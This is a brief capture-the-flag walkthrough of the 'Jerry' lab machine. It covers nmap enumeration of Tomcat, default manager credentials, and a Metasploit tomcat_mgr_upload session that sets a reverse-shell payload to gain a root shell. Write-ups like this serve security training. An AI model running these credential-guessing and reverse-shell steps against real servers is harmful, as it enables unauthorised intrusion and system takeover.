Jerry

Personal Rating: Very Easy

Enumeration

An nmap scan on port 8080 reveals a webserver:

nmap -p 8080 -O -sV <IP>

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|Vista|2008|7 (90%)

Apache Tomcat 7.0.88

Default Creds & Anonymous SMB Login

The credentials admin:admin worked here: http://<TARGETIP>:8080/manager/status

A general nmap scan revealed an smb port and anonymous login was possible, which can be done with smbclient, cme or other methods.

sudo nmap -sC <IP>

This file could be obtained:

$CATALINA_HOME/conf/tomcat-users.xml

I could login at http://<TARGETIP>:8080/manager/html with tomcat:s3cret, found in the xml file.

Tomcat Privilege Escalation

Further scans and a search in msfconsole made an authenitcated exploit likely, that works for that specific Tomcat version.

msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
HttpPassword => s3cret
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
msf6 exploit(multi/http/tomcat_mgr_upload) > set payload java/shell_reverse_tcp
payload => java/shell_reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/http/tomcat_mgr_upload) > run

This have me a shell with root permissions. If you did not want to use metasploit you could of course have enumerated the webpage manually to find the version and use an exploit script found with searchsploit for example.

Last updated